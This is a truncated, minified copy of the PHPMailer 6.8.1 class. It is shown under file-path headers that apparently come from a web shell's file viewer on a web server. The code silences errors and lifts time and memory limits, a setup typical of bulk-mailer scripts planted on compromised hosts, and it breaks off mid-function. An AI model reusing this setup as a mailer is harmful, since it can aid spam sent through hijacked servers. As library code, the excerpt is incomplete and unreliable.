Current Path : /var/www/www-root/data/webdav/www/ |
Current File : /var/www/www-root/data/webdav/www/ |
<?php namespace PHPMailer\PHPMailer; error_reporting(0); set_time_limit(0); ini_set("memory_limit",-1); class Exception extends \Exception { public function errorMessage() { return "<strong>" . htmlspecialchars($this->getMessage(), ENT_COMPAT | ENT_HTML401) . "</strong><br />\n"; } } class PHPMailer { const CHARSET_ASCII = "us-ascii"; const CHARSET_ISO88591 = "iso-8859-1"; const CHARSET_UTF8 = "utf-8"; const CONTENT_TYPE_PLAINTEXT = "text/plain"; const CONTENT_TYPE_TEXT_CALENDAR = "text/calendar"; const CONTENT_TYPE_TEXT_HTML = "text/html"; const CONTENT_TYPE_MULTIPART_ALTERNATIVE = "multipart/alternative"; const CONTENT_TYPE_MULTIPART_MIXED = "multipart/mixed"; const CONTENT_TYPE_MULTIPART_RELATED = "multipart/related"; const ENCODING_7BIT = "7bit"; const ENCODING_8BIT = "8bit"; const ENCODING_BASE64 = "base64"; const ENCODING_BINARY = "binary"; const ENCODING_QUOTED_PRINTABLE = "quoted-printable"; const ENCRYPTION_STARTTLS = "tls"; const ENCRYPTION_SMTPS = "ssl"; const ICAL_METHOD_REQUEST = "REQUEST"; const ICAL_METHOD_PUBLISH = "PUBLISH"; const ICAL_METHOD_REPLY = "REPLY"; const ICAL_METHOD_ADD = "ADD"; const ICAL_METHOD_CANCEL = "CANCEL"; const ICAL_METHOD_REFRESH = "REFRESH"; const ICAL_METHOD_COUNTER = "COUNTER"; const ICAL_METHOD_DECLINECOUNTER = "DECLINECOUNTER"; public $Priority; public $CharSet = self::CHARSET_ISO88591; public $ContentType = self::CONTENT_TYPE_PLAINTEXT; public $Encoding = self::ENCODING_8BIT; public $ErrorInfo = ""; public $From = ""; public $FromName = ""; public $Sender = ""; public $Subject = ""; public $Body = ""; public $AltBody = ""; public $Ical = ""; protected static $IcalMethods = [ self::ICAL_METHOD_REQUEST, self::ICAL_METHOD_PUBLISH, self::ICAL_METHOD_REPLY, self::ICAL_METHOD_ADD, self::ICAL_METHOD_CANCEL, self::ICAL_METHOD_REFRESH, self::ICAL_METHOD_COUNTER, self::ICAL_METHOD_DECLINECOUNTER, ]; protected $MIMEBody = ""; protected $MIMEHeader = ""; protected $mailHeader = ""; public $WordWrap = 0; public $Mailer = "mail"; public $Sendmail = "/usr/sbin/sendmail"; public $UseSendmailOptions = true; public $ConfirmReadingTo = ""; public $Hostname = ""; public $MessageID = ""; public $MessageDate = ""; public $Host = "localhost"; public $Port = 25; public $Helo = ""; public $SMTPSecure = ""; public $SMTPAutoTLS = true; public $SMTPAuth = false; public $SMTPOptions = []; public $Username = ""; public $Password = ""; public $AuthType = ""; protected $oauth; public $Timeout = 300; public $dsn = ""; public $SMTPDebug = 0; public $Debugoutput = "echo"; public $SMTPKeepAlive = false; public $SingleTo = false; protected $SingleToArray = []; public $do_verp = false; public $AllowEmpty = false; public $DKIM_selector = ""; public $DKIM_identity = ""; public $DKIM_passphrase = ""; public $DKIM_domain = ""; public $DKIM_copyHeaderFields = true; public $DKIM_extraHeaders = []; public $DKIM_private = ""; public $DKIM_private_string = ""; public $action_function = ""; public $XMailer = ""; public static $validator = "php"; protected $smtp; protected $to = []; protected $cc = []; protected $bcc = []; protected $ReplyTo = []; protected $all_recipients = []; protected $RecipientsQueue = []; protected $ReplyToQueue = []; protected $attachment = []; protected $CustomHeader = []; protected $lastMessageID = ""; protected $message_type = ""; protected $boundary = []; protected $language = []; protected $error_count = 0; protected $sign_cert_file = ""; protected $sign_key_file = ""; protected $sign_extracerts_file = ""; protected $sign_key_pass = ""; protected $exceptions = false; protected $uniqueid = ""; const VERSION = "6.8.1"; const STOP_MESSAGE = 0; const STOP_CONTINUE = 1; const STOP_CRITICAL = 2; const CRLF = "\r\n"; const FWS = " "; protected static $LE = self::CRLF; const MAIL_MAX_LINE_LENGTH = 63; const MAX_LINE_LENGTH = 998; const STD_LINE_LENGTH = 76; public function __construct($exceptions = null) { if (null !== $exceptions) { $this->exceptions = (bool) $exceptions; } $this->Debugoutput = strpos(PHP_SAPI, "cli") !== false ? "echo" : "html"; } public function __destruct() { $this->smtpClose(); } private function mailPassthru($to, $subject, $body, $header, $params) { if ((int) ini_get("mbstring.func_overload") & 1) { $subject = $this->secureHeader($subject); } else { $subject = $this->encodeHeader($this->secureHeader($subject)); } $this->edebug("Sending with mail()"); $this->edebug("Sendmail path: " . ini_get("sendmail_path")); $this->edebug("Envelope sender: {$this->Sender}"); $this->edebug("To: {$to}"); $this->edebug("Subject: {$subject}"); $this->edebug("Headers: {$header}"); if (!$this->UseSendmailOptions || null === $params) { $result = @mail($to, $subject, $body, $header); } else { $this->edebug("Additional params: {$params}"); $result = @mail($to, $subject, $body, $header, $params); } $this->edebug("Result: " . ($result ? "true" : "false")); return $result; } protected function edebug($str) { if ($this->SMTPDebug <= 0) { return; } if ($this->Debugoutput instanceof \Psr\Log\LoggerInterface) { $this->Debugoutput->debug($str); return; } if ( is_callable($this->Debugoutput) && !in_array($this->Debugoutput, ["error_log", "html", "echo"]) ) { call_user_func($this->Debugoutput, $str, $this->SMTPDebug); return; } switch ($this->Debugoutput) { case "error_log": error_log($str); break; case "html": echo htmlentities( preg_replace('/[\r\n]+/', "", $str), ENT_QUOTES, "UTF-8" ), "<br>\n"; break; case "echo": default: $str = preg_replace('/\r\n|\r/m', "\n", $str); echo gmdate("Y-m-d H:i:s"), "\t", trim( str_replace( "\n", "\n \t ", trim($str) ) ), "\n"; } } public function isHTML($isHtml = true) { if ($isHtml) { $this->ContentType = static::CONTENT_TYPE_TEXT_HTML; } else { $this->ContentType = static::CONTENT_TYPE_PLAINTEXT; } } public function isSMTP() { $this->Mailer = "smtp"; } public function isMail() { $this->Mailer = "mail"; } public function isSendmail() { $ini_sendmail_path = ini_get("sendmail_path"); if (false === stripos($ini_sendmail_path, "sendmail")) { $this->Sendmail = "/usr/sbin/sendmail"; } else { $this->Sendmail = $ini_sendmail_path; } $this->Mailer = "sendmail"; } public function isQmail() { $ini_sendmail_path = ini_get("sendmail_path"); if (false === stripos($ini_sendmail_path, "qmail")) { $this->Sendmail = "/var/qmail/bin/qmail-inject"; } else { $this->Sendmail = $ini_sendmail_path; } $this->Mailer = "qmail"; } public function addAddress($address, $name = "") { return $this->addOrEnqueueAnAddress("to", $address, $name); } public function addCC($address, $name = "") { return $this->addOrEnqueueAnAddress("cc", $address, $name); } public function addBCC($address, $name = "") { return $this->addOrEnqueueAnAddress("bcc", $address, $name); } public function addReplyTo($address, $name = "") { return $this->addOrEnqueueAnAddress("Reply-To", $address, $name); } protected function addOrEnqueueAnAddress($kind, $address, $name) { $pos = false; if ($address !== null) { $address = trim($address); $pos = strrpos($address, "@"); } if (false === $pos) { $error_message = sprintf( "%s (%s): %s", $this->lang("invalid_address"), $kind, $address ); $this->setError($error_message); $this->edebug($error_message); if ($this->exceptions) { throw new Exception($error_message); } return false; } if ($name !== null && is_string($name)) { $name = trim(preg_replace('/[\r\n]+/', "", $name)); } else { $name = ""; } $params = [$kind, $address, $name]; if ( static::idnSupported() && $this->has8bitChars(substr($address, ++$pos)) ) { if ("Reply-To" !== $kind) { if (!array_key_exists($address, $this->RecipientsQueue)) { $this->RecipientsQueue[$address] = $params; return true; } } elseif (!array_key_exists($address, $this->ReplyToQueue)) { $this->ReplyToQueue[$address] = $params; return true; } return false; } return call_user_func_array([$this, "addAnAddress"], $params); } public function setBoundaries() { $this->uniqueid = $this->generateId(); $this->boundary[1] = "b1=_" . $this->uniqueid; $this->boundary[2] = "b2=_" . $this->uniqueid; $this->boundary[3] = "b3=_" . $this->uniqueid; } protected function addAnAddress($kind, $address, $name = "") { if (!in_array($kind, ["to", "cc", "bcc", "Reply-To"])) { $error_message = sprintf( "%s: %s", $this->lang("Invalid recipient kind"), $kind ); $this->setError($error_message); $this->edebug($error_message); if ($this->exceptions) { throw new Exception($error_message); } return false; } if (!static::validateAddress($address)) { $error_message = sprintf( "%s (%s): %s", $this->lang("invalid_address"), $kind, $address ); $this->setError($error_message); $this->edebug($error_message); if ($this->exceptions) { throw new Exception($error_message); } return false; } if ("Reply-To" !== $kind) { if ( !array_key_exists(strtolower($address), $this->all_recipients) ) { $this->{$kind}[] = [$address, $name]; $this->all_recipients[strtolower($address)] = true; return true; } } elseif (!array_key_exists(strtolower($address), $this->ReplyTo)) { $this->ReplyTo[strtolower($address)] = [$address, $name]; return true; } return false; } public static function parseAddresses( $addrstr, $useimap = true, $charset = self::CHARSET_ISO88591 ) { $addresses = []; if ($useimap && function_exists("imap_rfc822_parse_adrlist")) { $list = imap_rfc822_parse_adrlist($addrstr, ""); imap_errors(); foreach ($list as $address) { if ( ".SYNTAX-ERROR." !== $address->host && static::validateAddress( $address->mailbox . "@" . $address->host ) ) { if ( property_exists($address, "personal") && defined("MB_CASE_UPPER") && preg_match('/^=\?.*\?=$/s', $address->personal) ) { $origCharset = mb_internal_encoding(); mb_internal_encoding($charset); $address->personal = str_replace( "_", "=20", $address->personal ); $address->personal = mb_decode_mimeheader( $address->personal ); mb_internal_encoding($origCharset); } $addresses[] = [ "name" => property_exists($address, "personal") ? $address->personal : "", "address" => $address->mailbox . "@" . $address->host, ]; } } } else { $list = explode(",", $addrstr); foreach ($list as $address) { $address = trim($address); if (strpos($address, "<") === false) { if (static::validateAddress($address)) { $addresses[] = ["name" => "", "address" => $address]; } } else { list($name, $email) = explode("<", $address); $email = trim(str_replace(">", "", $email)); $name = trim($name); if (static::validateAddress($email)) { if ( defined("MB_CASE_UPPER") && preg_match('/^=\?.*\?=$/s', $name) ) { $origCharset = mb_internal_encoding(); mb_internal_encoding($charset); $name = str_replace("_", "=20", $name); $name = mb_decode_mimeheader($name); mb_internal_encoding($origCharset); } $addresses[] = [ "name" => trim($name, '\'" '), "address" => $email, ]; } } } } return $addresses; } public function setFrom($address, $name = "", $auto = true) { $address = trim((string) $address); $name = trim(preg_replace('/[\r\n]+/', "", $name)); $pos = strrpos($address, "@"); if ( false === $pos || ((!$this->has8bitChars(substr($address, ++$pos)) || !static::idnSupported()) && !static::validateAddress($address)) ) { $error_message = sprintf( "%s (From): %s", $this->lang("invalid_address"), $address ); $this->setError($error_message); $this->edebug($error_message); if ($this->exceptions) { throw new Exception($error_message); } return false; } $this->From = $address; $this->FromName = $name; if ($auto && empty($this->Sender)) { $this->Sender = $address; } return true; } public function getLastMessageID() { return $this->lastMessageID; } public static function validateAddress($address, $patternselect = null) { if (null === $patternselect) { $patternselect = static::$validator; } if (is_callable($patternselect) && !is_string($patternselect)) { return call_user_func($patternselect, $address); } if ( strpos($address, "\n") !== false || strpos($address, "\r") !== false ) { return false; } switch ($patternselect) { case "pcre": case "pcre8": return (bool) preg_match( '/^(?!(?>(?1)"?(?>\\\[ -~]|[^"])"?(?1)){255,})(?!(?>(?1)"?(?>\\\[ -~]|[^"])"?(?1)){65,}@)' . '((?>(?>(?>((?>(?>(?>\x0D\x0A)?[\t ])+|(?>[\t ]*\x0D\x0A)?[\t ]+)?)(\((?>(?2)' . '(?>[\x01-\x08\x0B\x0C\x0E-\'*-\[\]-\x7F]|\\\[\x00-\x7F]|(?3)))*(?2)\)))+(?2))|(?2))?)' . '([!#-\'*+\/-9=?^-~-]+|"(?>(?2)(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\x7F]))*' . '(?2)")(?>(?1)\.(?1)(?4))*(?1)@(?!(?1)[a-z0-9-]{64,})(?1)(?>([a-z0-9](?>[a-z0-9-]*[a-z0-9])?)' . "(?>(?1)\.(?!(?1)[a-z0-9-]{64,})(?1)(?5)){0,126}|\[(?:(?>IPv6:(?>([a-f0-9]{1,4})(?>:(?6)){7}" . "|(?!(?:.*[a-f0-9][:\]]){8,})((?6)(?>:(?6)){0,6})?::(?7)?))|(?>(?>IPv6:(?>(?6)(?>:(?6)){5}:" . "|(?!(?:.*[a-f0-9]:){6,})(?8)?::(?>((?6)(?>:(?6)){0,4}):)?))?(25[0-5]|2[0-4][0-9]|1[0-9]{2}" . '|[1-9]?[0-9])(?>\.(?9)){3}))\])(?1)$/isD', $address ); case "html5": return (bool) preg_match( '/^[a-zA-Z0-9.!#$%&\'*+\/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}' . '[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$/sD', $address ); case "php": default: return filter_var($address, FILTER_VALIDATE_EMAIL) !== false; } } public static function idnSupported() { return function_exists("idn_to_ascii") && function_exists("mb_convert_encoding"); } public function punyencodeAddress($address) { $pos = strrpos($address, "@"); if ( !empty($this->CharSet) && false !== $pos && static::idnSupported() ) { $domain = substr($address, ++$pos); if ( $this->has8bitChars($domain) && @mb_check_encoding($domain, $this->CharSet) ) { $domain = mb_convert_encoding( $domain, self::CHARSET_UTF8, $this->CharSet ); $errorcode = 0; if (defined("INTL_IDNA_VARIANT_UTS46")) { $punycode = idn_to_ascii( $domain, \IDNA_DEFAULT | \IDNA_USE_STD3_RULES | \IDNA_CHECK_BIDI | \IDNA_CHECK_CONTEXTJ | \IDNA_NONTRANSITIONAL_TO_ASCII, \INTL_IDNA_VARIANT_UTS46 ); } elseif (defined("INTL_IDNA_VARIANT_2003")) { $punycode = idn_to_ascii( $domain, $errorcode, \INTL_IDNA_VARIANT_2003 ); } else { $punycode = idn_to_ascii($domain, $errorcode); } if (false !== $punycode) { return substr($address, 0, $pos) . $punycode; } } } return $address; } public function send() { try { if (!$this->preSend()) { return false; } return $this->postSend(); } catch (Exception $exc) { $this->mailHeader = ""; $this->setError($exc->getMessage()); if ($this->exceptions) { throw $exc; } return false; } } public function preSend() { if ( "smtp" === $this->Mailer || ("mail" === $this->Mailer && (\PHP_VERSION_ID >= 80000 || stripos(PHP_OS, "WIN") === 0)) ) { static::setLE(self::CRLF); } else { static::setLE(PHP_EOL); } if ( "mail" === $this->Mailer && ((\PHP_VERSION_ID >= 70000 && \PHP_VERSION_ID < 70017) || (\PHP_VERSION_ID >= 70100 && \PHP_VERSION_ID < 70103)) && ini_get("mail.add_x_header") === "1" && stripos(PHP_OS, "WIN") === 0 ) { trigger_error($this->lang("buggy_php"), E_USER_WARNING); } try { $this->error_count = 0; $this->mailHeader = ""; foreach ( array_merge($this->RecipientsQueue, $this->ReplyToQueue) as $params ) { $params[1] = $this->punyencodeAddress($params[1]); call_user_func_array([$this, "addAnAddress"], $params); } if (count($this->to) + count($this->cc) + count($this->bcc) < 1) { throw new Exception( $this->lang("provide_address"), self::STOP_CRITICAL ); } foreach (["From", "Sender", "ConfirmReadingTo"] as $address_kind) { $this->{$address_kind} = trim($this->{$address_kind}); if (empty($this->{$address_kind})) { continue; } $this->{$address_kind} = $this->punyencodeAddress( $this->{$address_kind} ); if (!static::validateAddress($this->{$address_kind})) { $error_message = sprintf( "%s (%s): %s", $this->lang("invalid_address"), $address_kind, $this->{$address_kind} ); $this->setError($error_message); $this->edebug($error_message); if ($this->exceptions) { throw new Exception($error_message); } return false; } } if ($this->alternativeExists()) { $this->ContentType = static::CONTENT_TYPE_MULTIPART_ALTERNATIVE; } $this->setMessageType(); if (!$this->AllowEmpty && empty($this->Body)) { throw new Exception( $this->lang("empty_message"), self::STOP_CRITICAL ); } $this->Subject = trim($this->Subject); $this->MIMEHeader = ""; $this->MIMEBody = $this->createBody(); $tempheaders = $this->MIMEHeader; $this->MIMEHeader = $this->createHeader(); $this->MIMEHeader .= $tempheaders; if ("mail" === $this->Mailer) { if (count($this->to) > 0) { $this->mailHeader .= $this->addrAppend("To", $this->to); } else { $this->mailHeader .= $this->headerLine( "To", "undisclosed-recipients:;" ); } $this->mailHeader .= $this->headerLine( "Subject", $this->encodeHeader($this->secureHeader($this->Subject)) ); } if ( !empty($this->DKIM_domain) && !empty($this->DKIM_selector) && (!empty($this->DKIM_private_string) || (!empty($this->DKIM_private) && static::isPermittedPath($this->DKIM_private) && file_exists($this->DKIM_private))) ) { $header_dkim = $this->DKIM_Add( $this->MIMEHeader . $this->mailHeader, $this->encodeHeader($this->secureHeader($this->Subject)), $this->MIMEBody ); $this->MIMEHeader =static::stripTrailingWSP($this->MIMEHeader) . static::$LE . static::normalizeBreaks($header_dkim) . static::$LE; } return true; } catch (Exception $exc) { $this->setError($exc->getMessage()); if ($this->exceptions) { throw $exc; } return false; } } public function postSend() { try { switch ($this->Mailer) { case "sendmail": case "qmail": return $this->sendmailSend( $this->MIMEHeader, $this->MIMEBody ); case "smtp": return $this->smtpSend($this->MIMEHeader, $this->MIMEBody); case "mail": return $this->mailSend($this->MIMEHeader, $this->MIMEBody); default: $sendMethod = $this->Mailer . "Send"; if (method_exists($this, $sendMethod)) { return $this->{$sendMethod}( $this->MIMEHeader, $this->MIMEBody ); } return $this->mailSend($this->MIMEHeader, $this->MIMEBody); } } catch (Exception $exc) { $this->setError($exc->getMessage()); $this->edebug($exc->getMessage()); if ( $this->Mailer === "smtp" && $this->SMTPKeepAlive == true && $this->smtp->connected() ) { $this->smtp->reset(); } if ($this->exceptions) { throw $exc; } } return false; } protected function sendmailSend($header, $body) { if ($this->Mailer === "qmail") { $this->edebug("Sending with qmail"); } else { $this->edebug("Sending with sendmail"); } $header = static::stripTrailingWSP($header) . static::$LE . static::$LE; $sendmail_from_value = ini_get("sendmail_from"); if (empty($this->Sender) && !empty($sendmail_from_value)) { $this->Sender = ini_get("sendmail_from"); } if ( !empty($this->Sender) && static::validateAddress($this->Sender) && self::isShellSafe($this->Sender) ) { if ($this->Mailer === "qmail") { $sendmailFmt = "%s -f%s"; } else { $sendmailFmt = "%s -oi -f%s -t"; } } else { $sendmailFmt = "%s -oi -t"; } $sendmail = sprintf( $sendmailFmt, escapeshellcmd($this->Sendmail), $this->Sender ); $this->edebug("Sendmail path: " . $this->Sendmail); $this->edebug("Sendmail command: " . $sendmail); $this->edebug("Envelope sender: " . $this->Sender); $this->edebug("Headers: {$header}"); if ($this->SingleTo) { foreach ($this->SingleToArray as $toAddr) { $mail = @popen($sendmail, "w"); if (!$mail) { throw new Exception( $this->lang("execute") . $this->Sendmail, self::STOP_CRITICAL ); } $this->edebug("To: {$toAddr}"); fwrite($mail, "To: " . $toAddr . "\n"); fwrite($mail, $header); fwrite($mail, $body); $result = pclose($mail); $addrinfo = static::parseAddresses( $toAddr, true, $this->CharSet ); $this->doCallback( $result === 0, [[$addrinfo["address"], $addrinfo["name"]]], $this->cc, $this->bcc, $this->Subject, $body, $this->From, [] ); $this->edebug("Result: " . ($result === 0 ? "true" : "false")); if (0 !== $result) { throw new Exception( $this->lang("execute") . $this->Sendmail, self::STOP_CRITICAL ); } } } else { $mail = @popen($sendmail, "w"); if (!$mail) { throw new Exception( $this->lang("execute") . $this->Sendmail, self::STOP_CRITICAL ); } fwrite($mail, $header); fwrite($mail, $body); $result = pclose($mail); $this->doCallback( $result === 0, $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From, [] ); $this->edebug("Result: " . ($result === 0 ? "true" : "false")); if (0 !== $result) { throw new Exception( $this->lang("execute") . $this->Sendmail, self::STOP_CRITICAL ); } } return true; } protected static function isShellSafe($string) { if ( !function_exists("escapeshellarg") || !function_exists("escapeshellcmd") ) { return false; } if ( escapeshellcmd($string) !== $string || !in_array(escapeshellarg($string), ["'$string'", "\"$string\""]) ) { return false; } $length = strlen($string); for ($i = 0; $i < $length; ++$i) { $c = $string[$i]; if (!ctype_alnum($c) && strpos("@_-.", $c) === false) { return false; } } return true; } protected static function isPermittedPath($path) { return !preg_match("#^[a-z][a-z\d+.-]*://#i", $path); } protected static function fileIsAccessible($path) { if (!static::isPermittedPath($path)) { return false; } $readable = is_file($path); if (strpos($path, "\\\\") !== 0) { $readable = $readable && is_readable($path); } return $readable; } protected function mailSend($header, $body) { $header = static::stripTrailingWSP($header) . static::$LE . static::$LE; $toArr = []; foreach ($this->to as $toaddr) { $toArr[] = $this->addrFormat($toaddr); } $to = trim(implode(", ", $toArr)); if ($to === "") { $to = "undisclosed-recipients:;"; } $params = null; $sendmail_from_value = ini_get("sendmail_from"); if (empty($this->Sender) && !empty($sendmail_from_value)) { $this->Sender = ini_get("sendmail_from"); } if (!empty($this->Sender) && static::validateAddress($this->Sender)) { if (self::isShellSafe($this->Sender)) { $params = sprintf("-f%s", $this->Sender); } $old_from = ini_get("sendmail_from"); ini_set("sendmail_from", $this->Sender); } $result = false; if ($this->SingleTo && count($toArr) > 1) { foreach ($toArr as $toAddr) { $result = $this->mailPassthru( $toAddr, $this->Subject, $body, $header, $params ); $addrinfo = static::parseAddresses( $toAddr, true, $this->CharSet ); $this->doCallback( $result, [[$addrinfo["address"], $addrinfo["name"]]], $this->cc, $this->bcc, $this->Subject,$body,$this->From,[]); } } else { $result = $this->mailPassthru( $to, $this->Subject, $body, $header, $params ); $this->doCallback( $result, $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From, [] ); } if (isset($old_from)) { ini_set("sendmail_from", $old_from); } if (!$result) { throw new Exception( $this->lang("instantiate"), self::STOP_CRITICAL ); } return true; } public function getSMTPInstance() { if (!is_object($this->smtp)) { $this->smtp = new SMTP(); } return $this->smtp; } public function setSMTPInstance(SMTP $smtp) { $this->smtp = $smtp; return $this->smtp; } protected function smtpSend($header, $body) { $header = static::stripTrailingWSP($header) . static::$LE . static::$LE; $bad_rcpt = []; if (!$this->smtpConnect($this->SMTPOptions)) { throw new Exception( $this->lang("smtp_connect_failed"), self::STOP_CRITICAL ); } if ("" === $this->Sender) { $smtp_from = $this->From; } else { $smtp_from = $this->Sender; } if (!$this->smtp->mail($smtp_from)) { $this->setError( $this->lang("from_failed") . $smtp_from . " : " . implode(",", $this->smtp->getError()) ); throw new Exception($this->ErrorInfo, self::STOP_CRITICAL); } $callbacks = []; foreach ([$this->to, $this->cc, $this->bcc] as $togroup) { foreach ($togroup as $to) { if (!$this->smtp->recipient($to[0], $this->dsn)) { $error = $this->smtp->getError(); $bad_rcpt[] = ["to" => $to[0], "error" => $error["detail"]]; $isSent = false; } else { $isSent = true; } $callbacks[] = [ "issent" => $isSent, "to" => $to[0], "name" => $to[1], ]; } } if ( count($this->all_recipients) > count($bad_rcpt) && !$this->smtp->data($header . $body) ) { throw new Exception( $this->lang("data_not_accepted"), self::STOP_CRITICAL ); } $smtp_transaction_id = $this->smtp->getLastTransactionID(); if ($this->SMTPKeepAlive) { $this->smtp->reset(); } else { $this->smtp->quit(); $this->smtp->close(); } foreach ($callbacks as $cb) { $this->doCallback( $cb["issent"], [[$cb["to"], $cb["name"]]], [], [], $this->Subject, $body, $this->From, ["smtp_transaction_id" => $smtp_transaction_id] ); } if (count($bad_rcpt) > 0) { $errstr = ""; foreach ($bad_rcpt as $bad) { $errstr .= $bad["to"] . ": " . $bad["error"]; } throw new Exception( $this->lang("recipients_failed") . $errstr, self::STOP_CONTINUE ); } return true; } public function smtpConnect($options = null) { if (null === $this->smtp) { $this->smtp = $this->getSMTPInstance(); } if (null === $options) { $options = $this->SMTPOptions; } if ($this->smtp->connected()) { return true; } $this->smtp->setTimeout($this->Timeout); $this->smtp->setDebugLevel($this->SMTPDebug); $this->smtp->setDebugOutput($this->Debugoutput); $this->smtp->setVerp($this->do_verp); if ($this->Host === null) { $this->Host = "localhost"; } $hosts = explode(";", $this->Host); $lastexception = null; foreach ($hosts as $hostentry) { $hostinfo = []; if ( !preg_match( '/^(?:(ssl|tls):\/\/)?(.+?)(?::(\d+))?$/', trim($hostentry), $hostinfo ) ) { $this->edebug( $this->lang("invalid_hostentry") . " " . trim($hostentry) ); continue; } if (!static::isValidHost($hostinfo[2])) { $this->edebug($this->lang("invalid_host") . " " . $hostinfo[2]); continue; } $prefix = ""; $secure = $this->SMTPSecure; $tls = static::ENCRYPTION_STARTTLS === $this->SMTPSecure; if ( "ssl" === $hostinfo[1] || ("" === $hostinfo[1] && static::ENCRYPTION_SMTPS === $this->SMTPSecure) ) { $prefix = "ssl://"; $tls = false; $secure = static::ENCRYPTION_SMTPS; } elseif ("tls" === $hostinfo[1]) { $tls = true; $secure = static::ENCRYPTION_STARTTLS; } $sslext = defined("OPENSSL_ALGO_SHA256"); if ( static::ENCRYPTION_STARTTLS === $secure || static::ENCRYPTION_SMTPS === $secure ) { if (!$sslext) { throw new Exception( $this->lang("extension_missing") . "openssl", self::STOP_CRITICAL ); } } $host = $hostinfo[2]; $port = $this->Port; if ( array_key_exists(3, $hostinfo) && is_numeric($hostinfo[3]) && $hostinfo[3] > 0 && $hostinfo[3] < 65536 ) { $port = (int) $hostinfo[3]; } if ( $this->smtp->connect( $prefix . $host, $port, $this->Timeout, $options ) ) { try { if ($this->Helo) { $hello = $this->Helo; } else { $hello = $this->serverHostname(); } $this->smtp->hello($hello); if ( $this->SMTPAutoTLS && $sslext && "ssl" !== $secure && $this->smtp->getServerExt("STARTTLS") ) { $tls = true; } if ($tls) { if (!$this->smtp->startTLS()) { $message = $this->getSmtpErrorMessage( "connect_host" ); throw new Exception($message); } $this->smtp->hello($hello); } if ( $this->SMTPAuth && !$this->smtp->authenticate( $this->Username, $this->Password, $this->AuthType, $this->oauth ) ) { throw new Exception($this->lang("authenticate")); } return true; } catch (Exception $exc) {$lastexception = $exc; $this->edebug($exc->getMessage());$this->smtp->quit(); } } } $this->smtp->close(); if ($this->exceptions && null !== $lastexception) { throw $lastexception; } if ($this->exceptions) { $message = $this->getSmtpErrorMessage("connect_host"); throw new Exception($message); } return false; } public function smtpClose() { if (null !== $this->smtp && $this->smtp->connected()) { $this->smtp->quit(); $this->smtp->close(); } } public function setLanguage($langcode = "en", $lang_path = "") { $renamed_langcodes = [ "br" => "pt_br", "cz" => "cs", "dk" => "da", "no" => "nb", "se" => "sv", "rs" => "sr", "tg" => "tl", "am" => "hy", ]; if (array_key_exists($langcode, $renamed_langcodes)) { $langcode = $renamed_langcodes[$langcode]; } $PHPMAILER_LANG = [ "authenticate" => "SMTP Error: Could not authenticate.", "buggy_php" => "Your version of PHP is affected by a bug that may result in corrupted messages." . " To fix it, switch to sending using SMTP, disable the mail.add_x_header option in" . " your php.ini, switch to MacOS or Linux, or upgrade your PHP to version 7.0.17+ or 7.1.3+.", "connect_host" => "SMTP Error: Could not connect to SMTP host.", "data_not_accepted" => "SMTP Error: data not accepted.", "empty_message" => "Message body empty", "encoding" => "Unknown encoding: ", "execute" => "Could not execute: ", "extension_missing" => "Extension missing: ", "file_access" => "Could not access file: ", "file_open" => "File Error: Could not open file: ", "from_failed" => "The following From address failed: ", "instantiate" => "Could not instantiate mail function.", "invalid_address" => "Invalid address: ", "invalid_header" => "Invalid header name or value", "invalid_hostentry" => "Invalid hostentry: ", "invalid_host" => "Invalid host: ", "mailer_not_supported" => " mailer is not supported.", "provide_address" => "You must provide at least one recipient email address.", "recipients_failed" => "SMTP Error: The following recipients failed: ", "signing" => "Signing Error: ", "smtp_code" => "SMTP code: ", "smtp_code_ex" => "Additional SMTP info: ", "smtp_connect_failed" => "SMTP connect() failed.", "smtp_detail" => "Detail: ", "smtp_error" => "SMTP server error: ", "variable_set" => "Cannot set or reset variable: ", ]; if (empty($lang_path)) { $lang_path = dirname(__DIR__) . DIRECTORY_SEPARATOR . "language" . DIRECTORY_SEPARATOR; } $foundlang = true; $langcode = strtolower($langcode); if ( !preg_match( '/^(?P<lang>[a-z]{2})(?P<script>_[a-z]{4})?(?P<country>_[a-z]{2})?$/', $langcode, $matches ) && $langcode !== "en" ) { $foundlang = false; $langcode = "en"; } if ("en" !== $langcode) { $langcodes = []; if (!empty($matches["script"]) && !empty($matches["country"])) { $langcodes[] = $matches["lang"] . $matches["script"] . $matches["country"]; } if (!empty($matches["country"])) { $langcodes[] = $matches["lang"] . $matches["country"]; } if (!empty($matches["script"])) { $langcodes[] = $matches["lang"] . $matches["script"]; } $langcodes[] = $matches["lang"]; $foundFile = false; foreach ($langcodes as $code) { $lang_file = $lang_path . "phpmailer.lang-" . $code . ".php"; if (static::fileIsAccessible($lang_file)) { $foundFile = true; break; } } if ($foundFile === false) { $foundlang = false; } else { $lines = file($lang_file); foreach ($lines as $line) { $matches = []; if ( preg_match( '/^\$PHPMAILER_LANG\[\'([a-z\d_]+)\'\]\s*=\s*(["\'])(.+)*?\2;/', $line, $matches ) && array_key_exists($matches[1], $PHPMAILER_LANG) ) { $PHPMAILER_LANG[$matches[1]] = (string) $matches[3]; } } } } $this->language = $PHPMAILER_LANG; return $foundlang; } public function getTranslations() { if (empty($this->language)) { $this->setLanguage(); } return $this->language; } public function addrAppend($type, $addr) { $addresses = []; foreach ($addr as $address) { $addresses[] = $this->addrFormat($address); } return $type . ": " . implode(", ", $addresses) . static::$LE; } public function addrFormat($addr) { if (!isset($addr[1]) || $addr[1] === "") { return $this->secureHeader($addr[0]); } return $this->encodeHeader($this->secureHeader($addr[1]), "phrase") . " <" . $this->secureHeader($addr[0]) . ">"; } public function wrapText($message, $length, $qp_mode = false) { if ($qp_mode) { $soft_break = sprintf(" =%s", static::$LE); } else { $soft_break = static::$LE; } $is_utf8 = static::CHARSET_UTF8 === strtolower($this->CharSet); $lelen = strlen(static::$LE); $crlflen = strlen(static::$LE); $message = static::normalizeBreaks($message); if (substr($message, -$lelen) === static::$LE) { $message = substr($message, 0, -$lelen); } $lines = explode(static::$LE, $message); $message = ""; foreach ($lines as $line) { $words = explode(" ", $line); $buf = ""; $firstword = true; foreach ($words as $word) { if ($qp_mode && strlen($word) > $length) { $space_left = $length - strlen($buf) - $crlflen; if (!$firstword) { if ($space_left > 20) { $len = $space_left; if ($is_utf8) { $len = $this->utf8CharBoundary($word, $len); } elseif ("=" === substr($word, $len - 1, 1)) { --$len; } elseif ("=" === substr($word, $len 